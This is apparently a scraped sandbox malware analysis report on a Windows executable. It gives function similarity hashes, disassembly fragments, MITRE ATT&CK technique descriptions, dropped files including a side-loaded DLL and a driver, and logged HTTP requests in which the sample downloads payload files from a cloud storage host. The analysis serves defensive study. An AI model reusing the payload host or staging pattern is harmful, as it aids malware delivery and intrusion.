Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 02a89b60fbf84a8b948277f34da2e6b76c3bd85fec52748c5a918c5ee430ecaf
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 69110672A18B8585E710AF23E4815AD6764EB46FD4F488075FF8807B6ACE38D996C740

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFE148C3990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE148C112F), ref: 00007FFE148C39E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE148C112F), ref: 00007FFE148C3A21

Strings

csm, xrefs: 00007FFE148C3A0E

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: 16f1939ca5e83929928bcf1361da9e46cf6969ae1a5f29f7bf0156ed269d98e3
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: C1112132619F4182DB118F16F440259B7E5FB89BA4F584270EE8D07B68DF3CD55ACB00

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DFFE
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DDFF
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	5_2_0000000140011270
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DE96
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DEFB
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000E178
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DDD9
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DFFE
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DDFF
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	7_2_0000000140011270
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DE96
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DEFB
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000E178
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	7_2_000000014000DDD9

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0000000000000000.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

C:\Users\user\Documents\MsMpList.dat

C:\Users\user\Documents\WordpadFilter.db

C:\Users\user\Documents\Y1mbCC.exe

C:\Users\user\Documents\vselog.dll

C:\Windows\System32\drivers\189atohci.sys

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
0000000000000000.exe

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Function 00007FFE11EC1C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Function 00007FFE11EC1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Function 00007FFE11EC11B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre